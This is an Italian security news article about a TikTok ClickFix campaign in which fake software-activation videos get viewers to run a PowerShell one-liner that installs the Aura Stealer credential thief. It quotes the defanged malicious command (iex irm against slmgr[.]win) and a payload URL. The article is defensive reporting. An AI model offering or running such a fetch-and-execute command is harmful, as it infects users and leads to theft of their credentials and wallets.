I criminali informatici stanno distribuendo malware che rubano informazioni attraverso una campagna su TikTok, utilizzando video che affermano falsamente di essere guide di attivazione gratuite per software popolari. L’operazione in corso, identificata il 19 ottobre 2025, utilizza un metodo di ingegneria sociale per indurre gli utenti a infettare i propri computer.
Il gestore dell’ISC Xavier Mertens ha riferito della campagna, sottolineando le sue somiglianze con un’operazione osservata da Trend Micro a maggio. I video di TikTok pretendono di offrire istruzioni per l’attivazione di software legittimi come Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro e Discord Nitro. La campagna promuove anche servizi fittizi, tra cui “Netflix Premium” e “Spotify Premium”, per attirare un pubblico più ampio.
La tecnica di attacco è nota come attacco ClickFix, che prevede la fornitura di istruzioni apparentemente utili che inducono gli utenti a eseguire comandi dannosi. I video mostrano un breve comando PowerShell di una riga e indicano agli spettatori di eseguirlo con privilegi di amministratore. Un comando di esempio mostrato è iex (irm slmgr[.]win/photoshop). Il nome del programma specifico all’interno dell’URL, ad esempio “photoshop”, viene modificato per corrispondere al software impersonato nel video.
Quando un utente esegue questo comando, PowerShell si connette al sito remoto slmgr[.]win. Questa azione recupera ed esegue un secondo script PowerShell, che quindi scarica due file eseguibili dalle pagine Cloudflare. Il primo file, scaricato da https://file-epq[.]pages[.]dev/updater.exe, è una variante del malware Aura Stealer. Aura Stealer è progettato per raccogliere credenziali salvate da browser Web, cookie di autenticazione, portafogli di criptovaluta e dati di accesso da altre applicazioni. Queste informazioni rubate vengono quindi caricate sugli aggressori, garantendo loro l’accesso agli account della vittima.
Viene scaricato anche un secondo payload, denominato source.exe. Questo eseguibile viene utilizzato per compilare automaticamente il codice utilizzando il compilatore Visual C# integrato nel framework .NET (csc.exe). Il codice compilato viene successivamente iniettato e lanciato direttamente in memoria. Lo scopo specifico di questo secondo carico utile non è stato ancora determinato.
Gli utenti che hanno seguito le istruzioni contenute in questi video devono considerare tutte le proprie credenziali compromesse e sono invitati a reimpostare immediatamente le password per tutti i siti Web e i servizi online che utilizzano.
Gli attacchi ClickFix sono diventati molto più comuni nell’ultimo anno. Vengono utilizzati per distribuire vari ceppi di malware in campagne relative al furto di ransomware e criptovaluta. Come pratica di sicurezza generale, gli utenti non dovrebbero mai copiare testo da un sito Web ed eseguirlo in una finestra di dialogo del sistema operativo, inclusa la barra degli indirizzi di Esplora file, il prompt dei comandi, PowerShell, il terminale macOS o le shell Linux.
